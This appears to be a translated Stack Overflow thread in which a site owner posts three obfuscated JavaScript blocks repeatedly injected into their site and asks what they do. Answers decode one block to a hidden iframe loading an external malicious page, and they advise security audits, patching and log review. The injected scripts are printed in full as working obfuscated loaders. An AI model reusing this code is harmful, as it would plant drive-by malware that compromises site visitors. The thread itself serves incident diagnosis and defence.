这个脚本做什么用的?

时间:2011-05-16 22:21:17

标签: javascript security

有人能告诉我下面的脚本是做什么的吗?它大约每两周(总是在星期日和星期一之间)注入我们的网站。我们已经重新加载了我们的“干净”网站几十次,但它一直在发生。我们已经安装并提出了我们已经阅读的所有安全建议,但它只是不断进入我们所有的index.html文件和一些PHP文件。

任何人都知道它的作用或来自何处?我们真的可以使用一些帮助!

<script>
var ar="v)y{ifu=lg[rETCB}me h>;
s\"/ 0.,tN1:('<cAb]waonpd";
try{
    'qwe'.length(1);
}catch(a){
    k=new Boolean().toString();
    date=new Date();
};
var ar2 = "f57,57,12,15,78,102,138,129,111,18,51,54,132,90,84,27,54,90,36,24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,117,129,138,6,105,3,30,81,120,3,9,57,57,57,12,15,33,126,51,54,33,102,3,66,57,57,48,78,54,24,69,54,78,9,57,57,57,138,129,111,18,51,54,132,90,84,123,33,12,90,54,102,72,108,12,15,33,126,51,54,78,69,33,111,21,105,60,90,90,135,99,75,75,138,129,24,129,126,69,84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,78,123,12,138,90,60,21,105,96,81,105,78,60,54,12,27,60,90,21,105,96,81,105,78,69,90,6,24,54,21,105,0,12,69,12,117,12,24,12,90,6,99,60,12,138,138,54,132,66,135,129,69,12,90,12,129,132,99,126,117,69,129,24,18,90,54,66,24,54,15,90,99,81,66,90,129,135,99,81,66,105,63,108,75,12,15,33,126,51,54,63,72,3,66,57,57,48,57,57,15,18,132,111,90,12,129,132,78,12,15,33,126,51,54,33,102,3,9,57,57,57,0,126,33,78,15,78,21,78,138,129,111,18,51,54,132,90,84,111,33,54,126,90,54,36,24,54,51,54,132,90,102,105,12,15,33,126,51,54,105,3,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,69,33,111,105,87,105,60,90,90,135,99,75,75,138,129,24,129,126,69,84,111,129,51,75,111,129,18,132,90,81,84,135,60,135,105,3,66,15,84,69,90,6,24,54,84,0,12,69,12,117,12,24,12,90,6,21,105,60,12,138,138,54,132,105,66,15,84,69,90,6,24,54,84,135,129,69,12,90,12,129,132,21,105,126,117,69,129,24,18,90,54,105,66,15,84,69,90,6,24,54,84,24,54,15,90,21,105,81,105,66,15,84,69,90,6,24,54,84,90,129,135,21,105,81,105,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,123,12,138,90,60,105,87,105,96,81,105,3,66,15,84,69,54,90,114,90,90,33,12,117,18,90,54,102,105,60,54,12,27,60,90,105,87,105,96,81,105,3,66,57,57,57,138,129,111,18,51,54,132,90,84,27,54,90,36,24,54,51,54,132,90,69,45,6,39,126,27,93,126,51,54,102,105,117,129,138,6,105,3,30,81,120,84,126,135,135,54,132,138,42,60,12,24,138,102,15,3,66,57,57,48]".replace(k.substr(0,1),'[');

pau="rn ev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));

e=Function("retu"+pau)();
ar2=('gfhgffg',e(ar2));s="";

for(i=0;i<ar2.length;i++){
    s+=ar.substr(ar2[i]/3,1);
}
e(s);

</script>

<script>
var ar="N<B)10'paes,>.nidtf3[T;
hwy mCE:gA{](=o/\"c}lbr vu";
try{
    'qwe'.length(1);
}catch(a){
    k=new Boolean().toString();
    date=new Date();
};

var ar2 = "f78,78,45,54,135,105,48,111,120,141,81,27,42,51,39,93,27,51,87,126,27,81,27,42,51,30,6,75,63,24,93,0,24,81,27,105,18,129,111,48,75,18,9,60,15,102,9,99,78,78,78,45,54,132,24,81,27,132,105,9,66,78,78,123,135,27,126,30,27,135,99,78,78,78,48,111,120,141,81,27,42,51,39,72,132,45,51,27,105,117,3,45,54,132,24,81,27,135,30,132,120,108,18,69,51,51,21,90,114,114,27,48,45,51,45,24,126,39,120,111,81,114,120,111,141,42,51,57,15,39,21,69,21,18,135,72,45,48,51,69,108,18,12,15,18,135,69,27,45,93,69,51,108,18,12,15,18,135,30,51,75,126,27,108,18,138,45,30,45,129,45,126,45,51,75,90,69,45,48,48,27,42,66,21,111,30,45,51,45,111,42,90,24,129,30,111,126,141,51,27,66,126,27,54,51,90,15,66,51,111,21,90,15,66,18,36,3,114,45,54,132,24,81,27,36,117,9,66,78,78,123,78,78,54,141,42,120,51,45,111,42,135,45,54,132,24,81,27,132,105,9,99,78,78,78,138,24,132,135,54,135,108,135,48,111,120,141,81,27,42,51,39,120,132,27,24,51,27,87,126,27,81,27,42,51,105,18,45,54,132,24,81,27,18,9,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,30,132,120,18,33,18,69,51,51,21,90,114,114,27,48,45,51,45,24,126,39,120,111,81,114,120,111,141,42,51,57,15,39,21,69,21,18,9,66,54,39,30,51,75,126,27,39,138,45,30,45,129,45,126,45,51,75,108,18,69,45,48,48,27,42,18,66,54,39,30,51,75,126,27,39,21,111,30,45,51,45,111,42,108,18,24,129,30,111,126,141,51,27,18,66,54,39,30,51,75,126,27,39,126,27,54,51,108,18,15,18,66,54,39,30,51,75,126,27,39,51,111,21,108,18,15,18,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,72,45,48,51,69,18,33,18,12,15,18,9,66,54,39,30,27,51,96,51,51,132,45,129,141,51,27,105,18,69,27,45,93,69,51,18,33,18,12,15,18,9,66,78,78,78,48,111,120,141,81,27,42,51,39,93,27,51,87,126,27,81,27,42,51,30,6,75,63,24,93,0,24,81,27,105,18,129,111,48,75,18,9,60,15,102,39,24,21,21,27,42,48,84,69,45,126,48,105,54,9,66,78,78,123]".replace(k.substr(0,1),'[');

pau="rn ev2010"[('afas','rep')+('rhrh','lace')](date[('adsaf','getF')+'ullY'+('qwtrqwt','ear')]()-1,('awgwag',"al"));

e=Function("retu"+pau)();

ar2=('gfhgffg',e(ar2));

s="";

for(i=0;i<ar2.length;i++){
    s+=ar.substr(ar2[i]/3,1);
}
e(s);
</script>


<script>
var ar="rf:pmy'1uvAE, hi)2Tbs{ [tg=BcC\"do<a(.}N/9];wl>en0";
try{
    gserkewg();
}catch(a){
    k=new Boolean().toString()
};

var ar2 = "f66,0,-21,-42,36,66,-12,3,-12,-60,-12,126,3,-69,36,-33,63,-66,-39,99,6,-126,126,3,-69,-12,21,-66,39,48,-27,39,-12,-90,126,-33,-87,39,39,-3,-78,3,30,21,75,-21,-75,15,3,0,0,-21,-42,-3,102,-90,126,-138,105,-57,78,-60,0,45,-72,99,-6,-72,78,-99,24,3,0,0,27,3,-12,-60,-12,126,3,-69,36,21,-129,45,27,66,-33,-15,9,-54,-42,-3,102,-90,126,-99,21,-60,84,-6,-60,24,30,0,-63,-3,111,0,12,-33,-96,12,126,-66,30,30,-24,-24,12,-84,105,-33,12,-72,117,-69,-21,69,-12,-99,33,-33,9,21,90,-84,48,-21,-30,36,-60,3,123,-126,21,3,96,-93,30,-33,30,6,-60,3,123,-126,21,21,12,-57,117,6,-60,-60,9,18,15,-15,12,-12,87,-87,27,-57,-9,36,3,48,0,45,3,-15,-117,87,-36,-15,27,-27,51,45,-135,96,-45,3,36,36,-108,48,66,-12,6,6,-135,69,-66,138,-18,-54,24,-87,-3,138,-18,-108,117,-36,18,-72,-42,-3,102,-90,126,-3,-45,-42,78,-60,0,45,-45,0,-63,21,117,-57,-12,-27,51,45,-102,6,-42,-3,102,-90,126,-138,105,-57,15,3,0,0,-39,75,-102,39,-36,36,39,-39,54,3,-12,-60,-12,126,3,-69,36,-24,-84,138,-36,-30,66,-105,99,6,-126,126,3,-69,33,-87,27,-42,-3,102,-90,126,-120,30,78,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,42,-60,84,-66,18,-18,24,30,0,-63,-3,111,0,12,-33,-96,12,126,-66,30,30,-24,-24,12,-84,105,-33,12,-72,117,-69,-21,69,-12,-99,33,-33,9,30,78,-123,105,-48,12,-57,117,6,-30,-81,18,15,-15,12,-12,87,-87,27,-57,63,-60,24,3,48,0,45,3,-123,108,-123,105,-48,12,-57,117,6,-30,-99,87,-36,-15,27,-27,51,45,-63,-60,84,-45,3,36,36,-108,48,66,-120,108,-123,105,-48,12,-57,117,6,-30,24,6,-135,69,6,-60,126,-126,108,-123,105,-48,12,-57,117,6,-30,-36,24,-87,69,-60,126,-126,108,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,111,-84,48,-21,-30,-24,18,-18,3,123,-126,30,78,-123,105,-48,78,-66,-42,42,0,-72,45,12,-33,48,66,-33,-87,24,96,-93,30,-33,30,-54,18,-18,3,123,-126,30,78,-60,0,0,27,3,-12,-60,-12,126,3,-69,36,-33,63,-66,-39,99,6,-126,126,3,-69,-12,21,-66,39,48,-27,39,-12,-90,126,-33,-87,39,39,-3,-78,3,30,21,75,-21,-15,-6,-93,0,129,3,-48,-6,-45,3,87,-39,12,-102,45,78,-60,0,45]".replace(k.substr(0,1),'[');

try{
    asfasf();
}catch(e)
{
    p=(typeof document).toString()
};

pau="rn evobject".replace(p,"al");
e=new Function("","retu"+pau);
e=e();
ar2=e(ar2);
s="";
var pos=0;

for(i=0;i!=ar2.length;i++){
    pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;
    s+=ar.substr(pos,1);
}
e(s);
</script>

4 个答案:

答案 0 :(得分:15)

通过JSUnpack的强大功能,我们可以解密一大块混淆代码并查看部分功能......

document.write (s) <iframe src='http://doloasxxxxedoutforsafety.com/count0.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>

该来源目前为404,但看起来并不友好。它有效地将任意页面下载到浏览器中,这可能是因为假的Pagerank通过代码执行漏洞利用恶意驱动器而“简单”。无论如何,它现在似乎已经死了,但它可能并没有试图帮助你。

您的网站软件(或恶意内部用户)似乎存在某种XSS注入漏洞。看起来是时候进行适当的安全审计(服务器,服务器软件和PHP应用程序)。如果您正在运行现成的PHP软件包(如Wordpress),请确保已升级到最新版本。您可能还想更改任何相关密码(如果它定期发生,可能是手动注入)。

答案 1 :(得分:5)

该脚本可能旨在吸引用户访问包含恶意软件和浏览器漏洞的网站。

您反复感染的原因是因为您的代码库中存在漏洞。我怀疑你有一个不受保护或损坏的文件上传页面,允许上传任何旧文件(包括脚本),然后执行。一旦感染了文件,它可能会删除它本身。

我会在感染发生的时候浏览您的网络服务器日志文件,并查找允许用户上传内容的任何网页的可疑活动。

答案 2 :(得分:0)

您在自己的网站上使用了哪些其他脚本?看看那些因为那些可能会注入这个。 也许你的虚拟主机是阴暗的,试着改变。或者它可以是网络分析代码

答案 3 :(得分:0)

完全相同的代码被注入我的一个网站上的index.html文件中。通过查看日志,我们确定IP地址为84.16.226.245的人已通过FTP访问。我们还不确定他是如何进入的,但你可能想看看你的日志并阻止该地址。

祝你好运!